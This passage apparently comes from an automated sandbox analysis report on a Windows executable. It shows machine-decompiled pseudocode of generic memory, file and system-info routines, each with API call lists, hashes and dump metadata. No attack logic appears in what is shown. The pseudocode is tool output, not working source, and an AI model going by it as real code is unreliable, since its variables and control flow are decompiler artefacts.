					 *_t14 = _t14;
					_t8 = _t14 + 4; // 0x4bbb78
					 *_t8 = _t14;
					_t23 = _t23 + 8;
					_t26 = _t26 - 1;
				} while (_t26 != 0);
				 *0x4bbaf4 = 0;
				E00405884(0x4bbaf8, 0x80);
				_t18 = 0;
				 *0x4bbaf0 = 0;
				_t31 =  *0x004BDB80;
				while(_t31 != 0x4bdb7c) {
					_t10 = _t31 + 4; // 0x4bdb7c
					_t18 = VirtualFree(_t31, 0, 0x8000);
					_t31 =  *_t10;
				}
				 *0x4bdb7c = 0x4bdb7c;
				 *0x004BDB80 = 0x4bdb7c;
				return _t18;
			}











                                                            0x004052e2
                                                            0x004052f9
                                                            0x004052e7
                                                            0x004052f2
                                                            0x004052f7
                                                            0x004052f7
                                                            0x004052fd
                                                            0x00405302
                                                            0x00405307
                                                            0x00405309
                                                            0x0040530e
                                                            0x00405311
                                                            0x0040531a
                                                            0x0040531d
                                                            0x00405320
                                                            0x00405320
                                                            0x00405323
                                                            0x00405325
                                                            0x00405328
                                                            0x0040532d
                                                            0x00405332
                                                            0x00405332
                                                            0x00405334
                                                            0x00405336
                                                            0x00405336
                                                            0x00405339
                                                            0x0040533c
                                                            0x0040533c
                                                            0x00405341
                                                            0x00405352
                                                            0x00405357
                                                            0x00405359
                                                            0x0040535e
                                                            0x00405375
                                                            0x00405363
                                                            0x0040536e
                                                            0x00405373
                                                            0x00405373
                                                            0x00405379
                                                            0x0040537b
                                                            0x00405382

                                                            APIs
                                                            • VirtualFree.KERNEL32(004BBAD8,00000000,00008000,?,?,?,?,004053D4,0040CB76,00000000,0040CB94), ref: 004052F2
                                                            • VirtualFree.KERNEL32(004BDB7C,00000000,00008000,004BBAD8,00000000,00008000,?,?,?,?,004053D4,0040CB76,00000000,0040CB94), ref: 0040536E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FreeVirtual
                                                            • String ID:
                                                            • API String ID: 1263568516-0
                                                            • Opcode ID: 2ac254642d4a9788115c799da738c06d3b344f11962515fad3d8dec7c1c1ac76
                                                            • Instruction ID: 8dfda0fc8014d777c4f42bdf36328f4fb77b4e1ecbcf9529c7d2d9386e1eba40
                                                            • Opcode Fuzzy Hash: 2ac254642d4a9788115c799da738c06d3b344f11962515fad3d8dec7c1c1ac76
                                                            • Instruction Fuzzy Hash: A5116D71A046008FC7689F199840B67BBE4EB88754F15C0BFE549EB791D7B8AC018F9C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004232EC, Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004232EC(long __eax, void* __edx) {
				short _v2052;
				signed int _t7;
				void* _t10;
				signed int _t16;
				void* _t17;

				_t10 = __edx;
				_t7 = FormatMessageW(0x3200, 0, __eax, 0,  &_v2052, 0x400, 0); // executed
				while(_t7 > 0) {
					_t16 =  *(_t17 + _t7 * 2 - 2) & 0x0000ffff;
					if(_t16 <= 0x20) {
						L1:
						_t7 = _t7 - 1;
						__eflags = _t7;
						continue;
					} else {
						_t20 = _t16 - 0x2e;
						if(_t16 == 0x2e) {
							goto L1;
						}
					}
					break;
				}
				return E00407BA8(_t10, _t7, _t17, _t20);
			}








                                                            0x004232f3
                                                            0x0042330b
                                                            0x00423313
                                                            0x00423317
                                                            0x00423320
                                                            0x00423312
                                                            0x00423312
                                                            0x00423312
                                                            0x00000000
                                                            0x00423322
                                                            0x00423322
                                                            0x00423326
                                                            0x00000000
                                                            0x00000000
                                                            0x00423326
                                                            0x00000000
                                                            0x00423320
                                                            0x00423339

                                                            APIs
                                                            • FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,00423C1E,00000000,00423C6F,?,00423E28), ref: 0042330B
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FormatMessage
                                                            • String ID:
                                                            • API String ID: 1306739567-0
                                                            • Opcode ID: 8c28d4cd2feba8420b72e2c8323dac74420019247290cbce7f55a68a80108edc
                                                            • Instruction ID: 75fedbff241bec6efc8727d26b236f8c34027f11b3bdd8370f626a5f6d270aaf
                                                            • Opcode Fuzzy Hash: 8c28d4cd2feba8420b72e2c8323dac74420019247290cbce7f55a68a80108edc
                                                            • Instruction Fuzzy Hash: 89E0D86075432121F624A9052C03B7B2129A7C0B12FE084367A80DE3D5DEADAF55525E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00422A18, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 31%
                                                            			E00422A18(void* __eax, void* __ebx, void* __ecx, void* __eflags) {
				char _v8;
				intOrPtr _t21;
				intOrPtr _t24;

				_push(0);
				_push(_t24);
				_push(0x422a5e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				E004229AC(__eax, __ecx,  &_v8, __eflags);
				GetFileAttributesW(E004084EC(_v8)); // executed
				_pop(_t21);
				 *[fs:eax] = _t21;
				_push(E00422A65);
				return E00407A20( &_v8);
			}






                                                            0x00422a1b
                                                            0x00422a22
                                                            0x00422a23
                                                            0x00422a28
                                                            0x00422a2b
                                                            0x00422a33
                                                            0x00422a41
                                                            0x00422a4a
                                                            0x00422a4d
                                                            0x00422a50
                                                            0x00422a5d

                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,00422A5E,?,?,00000000,?,00422A71,00422DE2,00000000,00422E27,?,?,00000000,00000000), ref: 00422A41
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 8cd9a521966ca01502d57987e2d96a70fbf8ec2bcb71e07358b87aea606a80f7
                                                            • Instruction ID: ce0c41168f735205187e46b6c3e9294348714fcf51f30dd0002a5427be662740
                                                            • Opcode Fuzzy Hash: 8cd9a521966ca01502d57987e2d96a70fbf8ec2bcb71e07358b87aea606a80f7
                                                            • Instruction Fuzzy Hash: D7E09231704308BBD721EB76DE9291AB7ECD788700BA14876B500E7682E6B86E108418
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00423DA8, Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00423DA8(signed int __ecx, void* __edx, signed char _a4, signed char _a8) {
				void* _t17;

				_t17 = CreateFileW(E004084EC(__edx),  *(0x4b92e0 + (_a8 & 0x000000ff) * 4),  *(0x4b92ec + (_a4 & 0x000000ff) * 4), 0,  *(0x4b92fc + (__ecx & 0x000000ff) * 4), 0x80, 0); // executed
				return _t17;
			}




                                                            0x00423de5
                                                            0x00423ded

                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00423DE5
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: dd9159e21b70a0e7bcb8d3c3b5b03a1c2ffc365921e6ade8a7c7864e99aae5ed
                                                            • Instruction ID: 37fe8146f2431012b4276926014d9d5fd10bf57e8855788e2bc853c5fce69268
                                                            • Opcode Fuzzy Hash: dd9159e21b70a0e7bcb8d3c3b5b03a1c2ffc365921e6ade8a7c7864e99aae5ed
                                                            • Instruction Fuzzy Hash: 81E048716441283FD6149ADE7C91F76779C9709754F404563F684D7281C4A59D1086FC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00409FA8, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00409FA8(void* __eax) {
				short _v532;
				void* __ebx;
				void* __esi;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t16 = __eax;
				_t22 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameW( *(__eax + 4),  &_v532, 0x20a);
					_t14 = E0040B234(_t21, _t16, _t18, _t19, _t22); // executed
					_t20 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t20;
					if(_t20 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}












                                                            0x00409fb0
                                                            0x00409fb2
                                                            0x00409fb6
                                                            0x00409fc6
                                                            0x00409fcf
                                                            0x00409fd4
                                                            0x00409fd6
                                                            0x00409fdb
                                                            0x00409fe0
                                                            0x00409fe0
                                                            0x00409fdb
                                                            0x00409fee

                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 00409FC6
                                                              • Part of subcall function 0040B234: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B270
                                                              • Part of subcall function 0040B234: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B2C1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileModuleName$LibraryLoad
                                                            • String ID:
                                                            • API String ID: 4113206344-0
                                                            • Opcode ID: 2301add7ea149dd4fbebfdf59b7b3942b6e3d1df22e9777a155c308e994de31e
                                                            • Instruction ID: 1beb63cefa55d3dba2b36e2095187d50c135a0cf4330adb642bee8d6847d8901
                                                            • Opcode Fuzzy Hash: 2301add7ea149dd4fbebfdf59b7b3942b6e3d1df22e9777a155c308e994de31e
                                                            • Instruction Fuzzy Hash: 7BE0C971A013119BCB10DE58C8C5A4A3798AB08754F044AA6AD24DF387D3B5DD1487D5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00423ED8, Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00423ED8(intOrPtr* __eax) {
				int _t4;
				intOrPtr* _t7;

				_t7 = __eax;
				_t4 = SetEndOfFile( *(__eax + 4)); // executed
				if(_t4 == 0) {
					return E00423CAC( *_t7);
				}
				return _t4;
			}





                                                            0x00423ed9
                                                            0x00423edf
                                                            0x00423ee6
                                                            0x00000000
                                                            0x00423eea
                                                            0x00423ef0

                                                            APIs
                                                            • SetEndOfFile.KERNEL32(?,7FBA0010,004B6358,00000000), ref: 00423EDF
                                                              • Part of subcall function 00423CAC: GetLastError.KERNEL32(004237FC,00423D4F,?,?,00000000,?,004B5F76,00000001,00000000,00000002,00000000,004B659E,?,00000000,004B65E2), ref: 00423CAF
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorFileLast
                                                            • String ID:
                                                            • API String ID: 734332943-0
                                                            • Opcode ID: 09339d9670a81d77462708df034512c3e9d7a5ee9c38b49a5b5d33688a33920b
                                                            • Instruction ID: ae15968ab9cd064c61534cde2c099b4aac4a7b80231ae1acb8e6de6fcc6ca8bf
                                                            • Opcode Fuzzy Hash: 09339d9670a81d77462708df034512c3e9d7a5ee9c38b49a5b5d33688a33920b
                                                            • Instruction Fuzzy Hash: 58C04C61300210478B04EEBBD5C190666E85B582157414466B904DB216E67DD9158615
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040CAA4, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0040CAA4() {
				intOrPtr _v16;
				struct _SYSTEM_INFO* _t3;

				GetSystemInfo(_t3); // executed
				return _v16;
			}





                                                            0x0040caa8
                                                            0x0040cab4

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: InfoSystem
                                                            • String ID:
                                                            • API String ID: 31276548-0
                                                            • Opcode ID: 9dd1f6b5bb1b0da35443b21aa4a452d0333aba70165927044b368234b0936b7a
                                                            • Instruction ID: 4f21eec972071caf62eebbeb90550a79e4d7a8082c8b53f17589c9beddeb5e45
                                                            • Opcode Fuzzy Hash: 9dd1f6b5bb1b0da35443b21aa4a452d0333aba70165927044b368234b0936b7a
                                                            • Instruction Fuzzy Hash: CDA012984088002AC404AB194C4340F39C819C1114FC40224745CB62C2E61D866403DB
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00403BCC, Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00403BCC(signed int __eax) {
				void* _t4;
				intOrPtr _t7;
				signed int _t8;
				void** _t10;
				void* _t12;
				void* _t14;

				_t8 = __eax;
				E00403B60(__eax);
				_t4 = VirtualAlloc(0, 0x13fff0, 0x1000, 4); // executed
				if(_t4 == 0) {
					 *0x4bbaf0 = 0;
					return 0;
				} else {
					_t10 =  *0x4bbadc; // 0x4bbad8
					_t14 = _t4;
					 *_t14 = 0x4bbad8;
					 *0x4bbadc = _t4;
					 *(_t14 + 4) = _t10;
					 *_t10 = _t4;
					_t12 = _t14 + 0x13fff0;
					 *((intOrPtr*)(_t12 - 4)) = 2;
					 *0x4bbaf0 = 0x13ffe0 - _t8;
					_t7 = _t12 - _t8;
					 *0x4bbaec = _t7;
					 *(_t7 - 4) = _t8 | 0x00000002;
					return _t7;
				}
			}









                                                            0x00403bce
                                                            0x00403bd0
                                                            0x00403be3
                                                            0x00403bea
                                                            0x00403c3c
                                                            0x00403c45
                                                            0x00403bec
                                                            0x00403bec
                                                            0x00403bf2
                                                            0x00403bf4
                                                            0x00403bfa
                                                            0x00403bff
                                                            0x00403c02
                                                            0x00403c06
                                                            0x00403c11
                                                            0x00403c1e
                                                            0x00403c26
                                                            0x00403c28
                                                            0x00403c35
                                                            0x00403c39
                                                            0x00403c39

                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,000001A3,004041E3,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000), ref: 00403BE3
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: cb8f292e3956ad7a1a5e0c92f19b435d8be5366ce3ed5ca5418bf36ecf0e0e1a
                                                            • Instruction ID: ee114c9f451a66722181258b66a673b4223530c98f306d9f720d31c7abdd50f3
                                                            • Opcode Fuzzy Hash: cb8f292e3956ad7a1a5e0c92f19b435d8be5366ce3ed5ca5418bf36ecf0e0e1a
                                                            • Instruction Fuzzy Hash: 71F087F2F002404FE7249F799D40742BAE8E709315B10827EE908EB799E7F488018B88
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00403CF6, Relevance: 1.3, APIs: 1, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 96%
                                                            			E00403CF6(void* __eax) {
				struct _MEMORY_BASIC_INFORMATION _v44;
				void* _v48;
				void* _t13;
				int _t20;
				void* _t22;
				signed int _t26;
				signed int _t29;
				signed int _t30;
				void* _t34;
				intOrPtr _t35;
				signed int _t39;
				void* _t41;
				void* _t42;

				_push(_t29);
				_t42 = _t41 + 0xffffffdc;
				_t34 = __eax - 0x10;
				E00403C48();
				_t13 = _t34;
				 *_t42 =  *_t13;
				_v48 =  *((intOrPtr*)(_t13 + 4));
				_t26 =  *(_t13 + 0xc);
				if((_t26 & 0x00000008) != 0) {
					_t22 = _t34;
					_t39 = _t26 & 0xfffffff0;
					_t30 = 0;
					while(1) {
						VirtualQuery(_t22,  &_v44, 0x1c);
						if(VirtualFree(_t22, 0, 0x8000) == 0) {
							break;
						}
						_t35 = _v44.RegionSize;
						if(_t39 > _t35) {
							_t39 = _t39 - _t35;
							_t22 = _t22 + _t35;
							continue;
						}
						goto L10;
					}
					_t30 = _t30 | 0xffffffff;
				} else {
					_t20 = VirtualFree(_t34, 0, 0x8000); // executed
					if(_t20 == 0) {
						_t30 = _t29 | 0xffffffff;
					} else {
						_t30 = 0;
					}
				}
				L10:
				if(_t30 == 0) {
					 *_v48 =  *_t42;
					 *( *_t42 + 4) = _v48;
				}
				 *0x4bdb78 = 0;
				return _t30;
			}
















                                                            0x00403cfa
                                                            0x00403cfc
                                                            0x00403d01
                                                            0x00403d04
                                                            0x00403d09
                                                            0x00403d0d
                                                            0x00403d13
                                                            0x00403d17
                                                            0x00403d1d
                                                            0x00403d39
                                                            0x00403d3d
                                                            0x00403d40
                                                            0x00403d42
                                                            0x00403d4a
                                                            0x00403d5e
                                                            0x00000000
                                                            0x00000000
                                                            0x00403d65
                                                            0x00403d6b
                                                            0x00403d6d
                                                            0x00403d6f
                                                            0x00000000
                                                            0x00403d6f
                                                            0x00000000
                                                            0x00403d6b
                                                            0x00403d60
                                                            0x00403d1f
                                                            0x00403d27
                                                            0x00403d2e
                                                            0x00403d34
                                                            0x00403d30
                                                            0x00403d30
                                                            0x00403d30
                                                            0x00403d2e
                                                            0x00403d73
                                                            0x00403d75
                                                            0x00403d7e
                                                            0x00403d87
                                                            0x00403d87
                                                            0x00403d8a
                                                            0x00403d9a

                                                            APIs
                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00403D27
                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00403D4A
                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00403D57
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Virtual$Free$Query
                                                            • String ID:
                                                            • API String ID: 778034434-0
                                                            • Opcode ID: 70118730a538275f8eba95c50282fe5a7e92951222106072b386c800723d93a4
                                                            • Instruction ID: 6789628300bf7aa479fe1b8b627d7daf3441881ad106b622f2e79b23e4dc796b
                                                            • Opcode Fuzzy Hash: 70118730a538275f8eba95c50282fe5a7e92951222106072b386c800723d93a4
                                                            • Instruction Fuzzy Hash: C5F06D353046005FD311DF1AC844B17BBE9EFC5711F15C67AE888973A1E635DD018796
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 0040A928, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 140stringlibraryfileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 78%
                                                            			E0040A928(short* __eax, intOrPtr __edx) {
				short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				struct _WIN32_FIND_DATAW _v612;
				short _v1134;
				signed int _t50;
				signed int _t51;
				void* _t55;
				signed int _t88;
				signed int _t89;
				intOrPtr* _t90;
				signed int _t101;
				signed int _t102;
				short* _t112;
				struct HINSTANCE__* _t113;
				short* _t115;
				short* _t116;
				void* _t117;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t113 = GetModuleHandleW(L"kernel32.dll");
				if(_t113 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t115 = _v8 + 4;
						goto L10;
					} else {
						if( *((short*)(_v8 + 2)) == 0x5c) {
							_t116 = E0040A904(_v8 + 4);
							if( *_t116 != 0) {
								_t14 = _t116 + 2; // 0x2
								_t115 = E0040A904(_t14);
								if( *_t115 != 0) {
									L10:
									_t88 = _t115 - _v8;
									_t89 = _t88 >> 1;
									if(_t88 < 0) {
										asm("adc ebx, 0x0");
									}
									_t43 = _t89 + 1;
									if(_t89 + 1 <= 0x105) {
										E0040A34C( &_v1134, _v8, _t43);
										while( *_t115 != 0) {
											_t112 = E0040A904(_t115 + 2);
											_t50 = _t112 - _t115;
											_t51 = _t50 >> 1;
											if(_t50 < 0) {
												asm("adc eax, 0x0");
											}
											if(_t51 + _t89 + 1 <= 0x105) {
												_t55 =  &_v1134 + _t89 + _t89;
												_t101 = _t112 - _t115;
												_t102 = _t101 >> 1;
												if(_t101 < 0) {
													asm("adc edx, 0x0");
												}
												E0040A34C(_t55, _t115, _t102 + 1);
												_v20 = FindFirstFileW( &_v1134,  &_v612);
												if(_v20 != 0xffffffff) {
													FindClose(_v20);
													if(lstrlenW( &(_v612.cFileName)) + _t89 + 1 + 1 <= 0x105) {
														 *((short*)(_t117 + _t89 * 2 - 0x46a)) = 0x5c;
														E0040A34C( &_v1134 + _t89 + _t89 + 2,  &(_v612.cFileName), 0x105 - _t89 - 1);
														_t89 = _t89 + lstrlenW( &(_v612.cFileName)) + 1;
														_t115 = _t112;
														continue;
													}
												}
											}
											goto L24;
										}
										E0040A34C(_v8,  &_v1134, _v12);
									}
								}
							}
						}
					}
				} else {
					_t90 = GetProcAddress(_t113, "GetLongPathNameW");
					if(_t90 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v1134);
						_push(_v8);
						if( *_t90() == 0) {
							goto L4;
						} else {
							E0040A34C(_v8,  &_v1134, _v12);
						}
					}
				}
				L24:
				return _v16;
			}






















                                                            0x0040a934
                                                            0x0040a937
                                                            0x0040a93d
                                                            0x0040a94a
                                                            0x0040a94e
                                                            0x0040a98d
                                                            0x0040a994
                                                            0x0040a9d4
                                                            0x00000000
                                                            0x0040a996
                                                            0x0040a99e
                                                            0x0040a9af
                                                            0x0040a9b5
                                                            0x0040a9bb
                                                            0x0040a9c3
                                                            0x0040a9c9
                                                            0x0040a9d7
                                                            0x0040a9d9
                                                            0x0040a9dc
                                                            0x0040a9de
                                                            0x0040a9e0
                                                            0x0040a9e0
                                                            0x0040a9e3
                                                            0x0040a9eb
                                                            0x0040a9fc
                                                            0x0040aac3
                                                            0x0040aa0e
                                                            0x0040aa12
                                                            0x0040aa14
                                                            0x0040aa16
                                                            0x0040aa18
                                                            0x0040aa18
                                                            0x0040aa23
                                                            0x0040aa33
                                                            0x0040aa37
                                                            0x0040aa39
                                                            0x0040aa3b
                                                            0x0040aa3d
                                                            0x0040aa3d
                                                            0x0040aa43
                                                            0x0040aa5b
                                                            0x0040aa62
                                                            0x0040aa68
                                                            0x0040aa84
                                                            0x0040aa86
                                                            0x0040aaad
                                                            0x0040aabf
                                                            0x0040aac1
                                                            0x00000000
                                                            0x0040aac1
                                                            0x0040aa84
                                                            0x0040aa62
                                                            0x00000000
                                                            0x0040aa23
                                                            0x0040aad9
                                                            0x0040aad9
                                                            0x0040a9eb
                                                            0x0040a9c9
                                                            0x0040a9b5
                                                            0x0040a99e
                                                            0x0040a950
                                                            0x0040a95b
                                                            0x0040a95f
                                                            0x00000000
                                                            0x0040a961
                                                            0x0040a961
                                                            0x0040a96c
                                                            0x0040a970
                                                            0x0040a975
                                                            0x00000000
                                                            0x0040a977
                                                            0x0040a983
                                                            0x0040a983
                                                            0x0040a975
                                                            0x0040a95f
                                                            0x0040aade
                                                            0x0040aae7

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,004162BC,?,?), ref: 0040A945
                                                            • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A956
                                                            • FindFirstFileW.KERNEL32(?,?,kernel32.dll,004162BC,?,?), ref: 0040AA56
                                                            • FindClose.KERNEL32(?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AA68
                                                            • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AA74
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AAB9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                            • String ID: GetLongPathNameW$\$kernel32.dll
                                                            • API String ID: 1930782624-3908791685
                                                            • Opcode ID: 2e7747c66ca0daf9bf73dcf24122f514d4f35ae2d915a4be054088bbf24f0c4d
                                                            • Instruction ID: 0568a8f2c4c85ac628058e700237ad117df8c3680498263a44950cac296231c5
                                                            • Opcode Fuzzy Hash: 2e7747c66ca0daf9bf73dcf24122f514d4f35ae2d915a4be054088bbf24f0c4d
                                                            • Instruction Fuzzy Hash: 7841A071B003189BCB20DE98CD85A9EB3B5AB44310F1485B69945F72C1EB7CAE51CF4A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004AF110, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42shutdownCOMMON
